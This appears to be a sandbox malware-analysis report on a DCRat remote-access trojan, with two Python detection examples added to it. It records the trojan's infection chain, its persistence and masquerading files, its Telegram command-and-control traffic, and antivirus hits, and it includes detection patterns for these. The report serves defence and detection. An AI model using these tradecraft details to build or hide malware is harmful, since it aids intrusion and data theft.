Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\msBroker\2lT5LH2HofMC1aCPgzVrsLj8Fs1JHh.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe "C:\Users\user\AppData\Roaming\msBroker/SurrogatewebSession.exe"
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline"
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NZDl7DWO67.bat"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41D7.tmp" "c:\Windows\System32\CSCD00016AF5F994D2B979CA07EFAA630F3.TMP"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe "C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe"
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A3BEFF SetEntriesInAclW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateDirectoryW,LocalFree | 0_2_00A3BEFF
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A40826 cpuid 0_2_00A40826
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00A3C093
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeCode function: GetLocaleInfoW,GetNumberFormatW,3_2_0032C093
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeCode function: GetLocaleInfoW,GetNumberFormatW,4_2_0073AF0F
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeQueries volume information: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeQueries volume information: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe VolumeInformation
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeQueries volume information: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeQueries volume information: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeQueries volume information: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe VolumeInformation
                                Source: C:\Recovery\winlogon.exeQueries volume information: C:\Recovery\winlogon.exe VolumeInformation
                                Source: C:\Recovery\winlogon.exeQueries volume information: C:\Recovery\winlogon.exe VolumeInformation
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeQueries volume information: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe VolumeInformation
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeQueries volume information: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe VolumeInformation
                                Source: C:\Recovery\winlogon.exeQueries volume information: C:\Recovery\winlogon.exe VolumeInformation
                                Source: C:\Recovery\winlogon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A3F05C GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00A3F05C
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeCode function: 0_2_00A2C365 GetVersionExW,0_2_00A2C365
                                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
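The process chain above (SFX stub -> cmd.exe -> work.exe -> dwartg.exe -> wscript.exe running a .vbe from AppData\Roaming -> cmd.exe -> SurrogatewebSession.exe -> csc.exe compiling a response file from AppData\Local\Temp, with winlogon.exe later running from C:\Recovery) is the telemetry a detection engineer would turn into process-creation rules. The following Python is an added example, not part of the Joe Sandbox report and not DCRat code: it implements three such checks (a core system binary outside System32/SysWOW64, csc.exe compiling from a user-writable path, a script host executing a script from a user-writable path), adds a check for the Telegram Bot API URL string the report found in memory, and runs them over records constructed from the command lines above. The record field names, the parent images of the constructed records, and the system-process and user-writable path lists are assumptions, not a real log schema.

```python
"""Process-creation detections for the chain recorded in this report.

Added example, not part of the Joe Sandbox report and not DCRat code.
Assumptions: the record fields (image, command_line, parent_image) are not a
real log schema; parent images of the sample records are inferred from the
process list above; SYSTEM_PROCESS_NAMES and USER_WRITABLE are illustrative.
"""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ProcEvent:
    image: str         # full path of the created process
    command_line: str
    parent_image: str  # full path of the creating process


# Core Windows processes that only run from the system directories (assumed list).
SYSTEM_PROCESS_NAMES = {"winlogon.exe", "csrss.exe", "smss.exe", "lsass.exe",
                        "services.exe", "svchost.exe", "wininit.exe"}
SYSTEM_DIRS = {"c:\\windows\\system32", "c:\\windows\\syswow64"}
# Path fragments marking directories an unprivileged user can write to (assumed list).
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\", "\\downloads\\")

_RESPONSE_FILE = re.compile(r'@"([^"]+)"|@(\S+)')                       # csc.exe @file argument
_SCRIPT_FILE = re.compile(r'[^"\s]+\.(?:vbe|vbs|js|jse|wsf|wsh)\b', re.IGNORECASE)
_TELEGRAM_BOT_API = re.compile(r"^https?://api\.telegram\.org/bot", re.IGNORECASE)


def _norm(path: str) -> str:
    return path.lower().replace("/", "\\")


def _in_user_writable(path: str) -> bool:
    p = _norm(path)
    return any(marker in p for marker in USER_WRITABLE)


def rule_system_binary_outside_system_dir(ev: ProcEvent) -> bool:
    """A system process name (e.g. winlogon.exe) executing outside System32/SysWOW64."""
    p = PureWindowsPath(_norm(ev.image))
    return p.name in SYSTEM_PROCESS_NAMES and str(p.parent) not in SYSTEM_DIRS


def rule_csc_from_user_writable(ev: ProcEvent) -> bool:
    """csc.exe/vbc.exe compiling a response file that lives in a user-writable directory."""
    if PureWindowsPath(_norm(ev.image)).name not in ("csc.exe", "vbc.exe"):
        return False
    m = _RESPONSE_FILE.search(ev.command_line)
    target = (m.group(1) or m.group(2)) if m else ev.command_line
    return _in_user_writable(target)


def rule_script_host_from_user_writable(ev: ProcEvent) -> bool:
    """wscript.exe/cscript.exe running a script file from a user-writable directory."""
    if PureWindowsPath(_norm(ev.image)).name not in ("wscript.exe", "cscript.exe"):
        return False
    return any(_in_user_writable(s) for s in _SCRIPT_FILE.findall(ev.command_line))


RULES = {
    "system_binary_outside_system_dir": rule_system_binary_outside_system_dir,
    "csc_from_user_writable": rule_csc_from_user_writable,
    "script_host_from_user_writable": rule_script_host_from_user_writable,
}


def evaluate(events):
    """Return [(command_line, [rule names that fired])] for every event that fired at least one rule."""
    hits = []
    for ev in events:
        fired = [name for name, rule in RULES.items() if rule(ev)]
        if fired:
            hits.append((ev.command_line, fired))
    return hits


def is_telegram_bot_api(url: str) -> bool:
    """Flag Telegram Bot API URLs such as the https://api.telegram.org/bot... string found in memory."""
    return bool(_TELEGRAM_BOT_API.match(url))


# CONSTRUCTED records: command lines copied from the report, parent images inferred.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\SysWOW64\wscript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe"',
              r"C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe"),
    ProcEvent(r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline"',
              r"C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe"),
    ProcEvent(r"C:\Recovery\winlogon.exe", r"C:\Recovery\winlogon.exe", r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe",
              r'"C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe"',
              r"C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe"),  # none of the three rules covers this
    # Benign controls (constructed): the real winlogon.exe, and a developer build through csc.exe.
    ProcEvent(r"C:\Windows\System32\winlogon.exe", "winlogon.exe", r"C:\Windows\System32\smss.exe"),
    ProcEvent(r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r'csc.exe /noconfig @"C:\Projects\app\obj\Debug\app.cmdline"',
              r"C:\Program Files\dotnet\dotnet.exe"),
]

if __name__ == "__main__":
    for command_line, fired in evaluate(SAMPLE_EVENTS):
        print(", ".join(fired), "<-", command_line)
```

Run stand-alone, the script reports the wscript.exe, csc.exe and C:\Recovery\winlogon.exe records and stays silent on the two benign controls; dwartg.exe itself is not caught, which is the point of pairing path-based rules with the file-level and network indicators elsewhere in the report.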

Stealing of Sensitive Information

Yara match | File source: 8.0.SurrogatewebSession.exe.bc0000.0.unpack, type: UNPACKEDPE
Yara match | File source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, type: UNPACKEDPE
Yara match | File source: 4.3.dwartg.exe.70006d6.1.raw.unpack, type: UNPACKEDPE
Yara match | File source: 4.3.dwartg.exe.70006d6.1.unpack, type: UNPACKEDPE
Yara match | File source: 4.3.dwartg.exe.66f46d6.0.unpack, type: UNPACKEDPE
Yara match | File source: 00000008.00000000.1663208372.0000000000BC2000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Yara match | File source: 00000004.00000003.1624273489.0000000006FB2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Yara match | File source: 00000004.00000003.1624823463.0000000004F0D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Yara match | File source: 00000004.00000003.1623801206.00000000066A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Yara match | File source: 00000003.00000003.1620690565.0000000004F96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Yara match | File source: Process Memory Space: work.exe PID: 7588, type: MEMORYSTR
Yara match | File source: Process Memory Space: dwartg.exe PID: 7628, type: MEMORYSTR
Yara match | File source: Process Memory Space: SurrogatewebSession.exe PID: 7784, type: MEMORYSTR
Yara match | File source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
Yara match | File source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
Yara match | File source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
Yara match | File source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
Yara match | File source: C:\Recovery\winlogon.exe, type: DROPPED
Yara match | File source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe, type: DROPPED
Yara match | File source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, type: DROPPED

Remote Access Functionality

Yara match | File source: 8.0.SurrogatewebSession.exe.bc0000.0.unpack, type: UNPACKEDPE
Yara match | File source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, type: UNPACKEDPE
Yara match | File source: 4.3.dwartg.exe.70006d6.1.raw.unpack, type: UNPACKEDPE
Yara match | File source: 4.3.dwartg.exe.70006d6.1.unpack, type: UNPACKEDPE
Yara match | File source: 4.3.dwartg.exe.66f46d6.0.unpack, type: UNPACKEDPE
Yara match | File source: 00000008.00000000.1663208372.0000000000BC2000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Yara match | File source: 00000004.00000003.1624273489.0000000006FB2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Yara match | File source: 00000004.00000003.1624823463.0000000004F0D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Yara match | File source: 00000004.00000003.1623801206.00000000066A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Yara match | File source: 00000003.00000003.1620690565.0000000004F96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Yara match | File source: Process Memory Space: work.exe PID: 7588, type: MEMORYSTR
Yara match | File source: Process Memory Space: dwartg.exe PID: 7628, type: MEMORYSTR
Yara match | File source: Process Memory Space: SurrogatewebSession.exe PID: 7784, type: MEMORYSTR
Yara match | File source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
Yara match | File source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
Yara match | File source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
Yara match | File source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, type: DROPPED
Yara match | File source: C:\Recovery\winlogon.exe, type: DROPPED
Yara match | File source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe, type: DROPPED
Yara match | File source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe, type: DROPPED

MITRE ATT&CK Matrix

One line per tactic. A number in front of a technique is the hit marker printed in the report's matrix; techniques without a number are the unmatched remainder of the matrix rows shown in the report.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: 11 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 11 Windows Management Instrumentation; 12 Native API; 2 Command and Scripting Interpreter; 1 Scheduled Task/Job; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 11 Scripting; 1 DLL Side-Loading; 1 Scheduled Task/Job; 21 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 DLL Side-Loading; 11 Process Injection; 1 Scheduled Task/Job; 21 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 21 Obfuscated Files or Information; 11 Software Packing; 1 DLL Side-Loading; 1 File Deletion; 33 Masquerading; 31 Virtualization/Sandbox Evasion; 11 Process Injection
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 1 System Time Discovery; 3 File and Directory Discovery; 37 System Information Discovery; 121 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; Network Sniffing
Lateral Movement: 1 Taint Shared Content; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 11 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 1 Web Service; 1 Ingress Tool Transfer; 11 Encrypted Channel; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph

Behavior Graph ID: 1417539 | Sample: H9gMIu2HXi.exe | Start date: 29/03/2024 | Architecture: WINDOWS | Score: 100

Contacted hosts: api.telegram.org (149.154.167.220, port 443, TELEGRAMRU, United Kingdom; signature: Uses the Telegram API (likely for C&C communication)) and ipinfo.io (34.117.186.192, port 443, GOOGLE-AS-APGoogleAsiaPacificPteLtdSG, United States).
Top-level signatures: Snort IDS alert for network traffic; Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; 12 other signatures.

Process tree recovered from the graph (graph node numbers in brackets):

[14] H9gMIu2HXi.exe
    dropped: C:\Users\user\AppData\Local\Temp\...\work.exe (PE32)
    [24] cmd.exe
        [28] work.exe
            dropped: C:\Users\user\AppData\Local\...\dwartg.exe (PE32); signature: Multi AV Scanner detection for dropped file
            [36] dwartg.exe
                dropped: C:\Users\user\...\SurrogatewebSession.exe (PE32); C:\Users\user\AppData\Roaming\...\xIIr5uE.vbe (data)
                signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                [40] wscript.exe
                    signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    [43] cmd.exe
                        [45] SurrogatewebSession.exe
                            network: api.telegram.org 149.154.167.220:443 (local port 49732); ipinfo.io 34.117.186.192:443 (local ports 49730, 49731)
                            dropped: C:\Users\user\Desktop\vybNluDs.log, C:\Users\user\Desktop\tnEMlbYs.log, C:\Users\user\Desktop\lKwWBiIK.log (all PE32); 10 other malicious files
                            signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Creates an undocumented autostart registry key; 4 other signatures
                            [52] csc.exe
                                dropped: C:\Windows\...\SecurityHealthSystray.exe (PE32); signature: Infects executable files (exe, dll, sys, html)
                                [62] conhost.exe
                                [64] cvtres.exe
                            [56] cmd.exe
                                [66] conhost.exe
                                [68] chcp.com
                                [70] w32tm.exe
                                [72] SurrogatewebSession.exe
                            [58] schtasks.exe
                            [60] 17 other processes
                        [50] conhost.exe
        [32] conhost.exe
[17] winlogon.exe
    dropped: C:\Users\user\Desktop\tRVOBpwv.log, C:\Users\user\Desktop\rGzNBWQu.log, C:\Users\user\Desktop\aEtIhTbg.log (all PE32); 3 other malicious files
    [26] cmd.exe
        [34] conhost.exe
[19] winlogon.exe
    signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
[22] 6 other processes



Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
H9gMIu2HXi.exe | 61% | Virustotal |
H9gMIu2HXi.exe | 42% | ReversingLabs | ByteCode-MSIL.Trojan.Generic

Dropped Files

Source | Detection | Scanner | Label
C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe | 100% | Avira | HEUR/AGEN.1309961
C:\Users\user\Desktop\BudDliLc.log | 100% | Avira | HEUR/AGEN.1300079
C:\Users\user\Desktop\LdxTVLQK.log | 100% | Avira | TR/PSW.Agent.qngqt
C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe | 100% | Avira | HEUR/AGEN.1309961
C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe | 100% | Avira | VBS/Runner.VPG
C:\Users\user\Desktop\MFrsFgjH.log | 100% | Avira | TR/PSW.Agent.qngqt
C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | 100% | Avira | HEUR/AGEN.1309961
C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | 100% | Avira | VBS/Runner.VPG
C:\Users\user\AppData\Local\Temp\NZDl7DWO67.bat | 100% | Avira | BAT/Runner.IL
C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe | 100% | Avira | HEUR/AGEN.1309961
C:\Recovery\winlogon.exe | 100% | Avira | HEUR/AGEN.1309961
C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe | 100% | Avira | HEUR/AGEN.1309961
C:\Users\user\Desktop\vybNluDs.log | 100% | Avira | HEUR/AGEN.1300079
C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe | 100% | Joe Sandbox ML |
C:\Windows\System32\SecurityHealthSystray.exe | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\tRVOBpwv.log | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\tnEMlbYs.log | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\aEtIhTbg.log | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe | 100% | Joe Sandbox ML |
C:\Recovery\winlogon.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\TDfrhvdw.log | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe | 70% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe | 70% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe | 70% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe | 70% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Recovery\winlogon.exe | 70% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | 14% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | 20% | Virustotal |
C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | 65% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | 58% | Virustotal |
C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | 70% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\BudDliLc.log | 17% | ReversingLabs |
C:\Users\user\Desktop\BudDliLc.log | 20% | Virustotal |
C:\Users\user\Desktop\LdxTVLQK.log | 67% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\LdxTVLQK.log | 69% | Virustotal |
C:\Users\user\Desktop\MFrsFgjH.log | 67% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\MFrsFgjH.log | 69% | Virustotal |
C:\Users\user\Desktop\RAtJMMZA.log | 10% | ReversingLabs |
C:\Users\user\Desktop\RAtJMMZA.log | 25% | Virustotal |
C:\Users\user\Desktop\TDfrhvdw.log | 8% | ReversingLabs |
C:\Users\user\Desktop\TDfrhvdw.log | 10% | Virustotal |
C:\Users\user\Desktop\WslZMRrk.log | 10% | ReversingLabs |
C:\Users\user\Desktop\WslZMRrk.log | 25% | Virustotal |
C:\Users\user\Desktop\aEtIhTbg.log | 8% | ReversingLabs |
C:\Users\user\Desktop\aEtIhTbg.log | 10% | Virustotal |
C:\Users\user\Desktop\lKwWBiIK.log | 0% | ReversingLabs |
C:\Users\user\Desktop\lKwWBiIK.log | 1% | Virustotal |
C:\Users\user\Desktop\rGzNBWQu.log | 0% | ReversingLabs |
C:\Users\user\Desktop\rGzNBWQu.log | 1% | Virustotal |
C:\Users\user\Desktop\tRVOBpwv.log | 8% | ReversingLabs |
C:\Users\user\Desktop\tRVOBpwv.log | 7% | Virustotal |
C:\Users\user\Desktop\tnEMlbYs.log | 8% | ReversingLabs |
C:\Users\user\Desktop\tnEMlbYs.log | 7% | Virustotal |
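Several of the Desktop files in the table above carry a .log extension yet are flagged as trojans, and the report's behavior graph records them as PE32 images. The following Python is an added example, not part of the Joe Sandbox report: it tells PE images apart from genuine logs by parsing the DOS/PE header (MZ stub, e_lfanew, "PE\0\0" signature) instead of trusting the extension, and runs over a constructed sample set whose paths come from the report and whose contents are synthesised minimal headers, not the real samples. The executable-extension list is an assumption.

```python
"""Content-vs-extension check for dropped files.

Added example, not part of the Joe Sandbox report. File contents below are
CONSTRUCTED minimal headers; the extension list is an assumption.
"""
import struct
from pathlib import PureWindowsPath

EXECUTABLE_EXTENSIONS = {".exe", ".dll", ".sys", ".scr", ".ocx", ".cpl", ".drv"}


def looks_like_pe(data: bytes) -> bool:
    """True if data begins with a DOS header whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)   # offset of the PE signature
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def disguised_executables(files: dict) -> list:
    """Paths whose content is a PE image but whose extension is not an executable type."""
    return sorted(
        path for path, data in files.items()
        if looks_like_pe(data)
        and PureWindowsPath(path).suffix.lower() not in EXECUTABLE_EXTENSIONS
    )


def _minimal_pe() -> bytes:
    """CONSTRUCTED: the smallest byte string that satisfies looks_like_pe (not a loadable image)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)    # e_lfanew -> directly after the DOS header
    return bytes(dos) + b"PE\0\0" + bytes(20)  # PE signature + zeroed COFF header


# CONSTRUCTED sample set: paths from the report, contents synthesised here.
SAMPLE_FILES = {
    r"C:\Users\user\Desktop\tRVOBpwv.log": _minimal_pe(),
    r"C:\Users\user\Desktop\lKwWBiIK.log": _minimal_pe(),
    r"C:\Recovery\winlogon.exe": _minimal_pe(),                      # PE with executable extension: not disguised
    r"C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe": b"not a PE image",
    r"C:\Users\user\Desktop\notes.log": b"2024-03-29 plain text log line\n",  # constructed benign control
}

if __name__ == "__main__":
    for path in disguised_executables(SAMPLE_FILES):
        print("PE image with non-executable extension:", path)
```

The header walk is deliberately minimal: it does not validate the COFF or optional headers, so it accepts any file that merely claims to be PE, which is the right bias for a triage filter that feeds the results to a full parser or a scanner.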
                                No Antivirus matches
                                No Antivirus matches
                                No Antivirus matches
Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
ipinfo.io | 34.117.186.192 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high

URLs

Name | Malicious | Antivirus Detection | Reputation
https://ipinfo.io/country | false | | high
https://ipinfo.io/ip | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
https://api.telegram.org | SurrogatewebSession.exe, 00000008.00000002.1734602264.0000000003397000.00000004.00000800.00020000.00000000.sdmp | false | | high
